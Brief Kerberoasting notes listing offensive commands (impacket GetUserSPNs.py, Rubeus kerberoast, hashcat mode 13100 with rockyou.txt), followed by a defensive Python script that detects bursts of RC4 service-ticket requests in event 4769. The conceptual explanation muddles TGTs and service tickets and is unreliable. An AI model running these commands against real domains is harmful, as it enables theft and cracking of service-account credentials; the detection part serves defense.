Kerberoasting
Basically, Kerberos encrypts TGTs, which are just tickets that the Domain Controller provides to the user, with the Kerberos hash. The TGS is basically a longer hash afterwards. We present the TGS to be able to use other services without having to authenticate manually. (NOT AN AD EXPERT, DON'T KILL ME :()
python3 GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of domain controller> -request
Also try thats not in impacket.
Kerberoasting with Rubeus
Rubeus.exe kerberoast
Cracking TGTs
hashcat -m 13100 -a 0 kerberosast.txt rockyou.txt
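Detecting this from the defender's side
Hashcat mode 13100 targets RC4 (etype 23, 0x17) service tickets, so one account requesting RC4 tickets for several service accounts in a short time stands out in Windows Security event 4769. The sketch below is an added example, not part of the original notes or of any tool named here; the tuple layout, the 5-minute window, the threshold of 3 and the sample events are all constructed assumptions.

```python
# Added example: flag possible Kerberoasting from event 4769 records
# (Kerberos service ticket requested). All sample data is constructed.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # etype 23, the ticket type hashcat -m 13100 cracks
WINDOW = timedelta(minutes=5)   # assumed tuning value
THRESHOLD = 3                   # assumed: distinct services per account per window

# Constructed records: (time, requesting account, service name, ticket etype)
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", "alice@CORP.LOCAL", "svc_sql", "0x17"),
    ("2024-01-10T09:00:02", "alice@CORP.LOCAL", "svc_web", "0x17"),
    ("2024-01-10T09:00:04", "alice@CORP.LOCAL", "svc_backup", "0x17"),
    ("2024-01-10T09:10:00", "bob@CORP.LOCAL", "svc_sql", "0x12"),      # AES256
    ("2024-01-10T09:10:05", "bob@CORP.LOCAL", "FILESRV01$", "0x17"),   # machine account
    ("2024-01-10T09:00:00", "carol@CORP.LOCAL", "svc_sql", "0x17"),
    ("2024-01-10T11:00:00", "carol@CORP.LOCAL", "svc_web", "0x17"),
    ("2024-01-10T14:00:00", "carol@CORP.LOCAL", "svc_backup", "0x17"),
]

def is_candidate(service, etype):
    """RC4 ticket for a user-backed service (not a machine account or krbtgt)."""
    user_service = not service.endswith("$") and service.lower() != "krbtgt"
    return etype.lower() == RC4_HMAC and user_service

def find_kerberoast_suspects(events, window=WINDOW, threshold=THRESHOLD):
    """Return {account: sorted services} for accounts that requested RC4
    tickets for >= threshold distinct services inside one sliding window."""
    per_account = defaultdict(list)
    for ts, account, service, etype in events:
        if is_candidate(service, etype):
            per_account[account].append((datetime.fromisoformat(ts), service))
    suspects = {}
    for account, reqs in per_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1          # slide the window's left edge forward
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= threshold:
                suspects.setdefault(account, set()).update(services)
    return {acct: sorted(svcs) for acct, svcs in suspects.items()}

if __name__ == "__main__":
    for account, services in find_kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"{account}: RC4 service tickets requested for {services}")
```

Requests spread over hours (carol) and AES or machine-account tickets (bob) are not flagged; only the burst of RC4 requests from alice is.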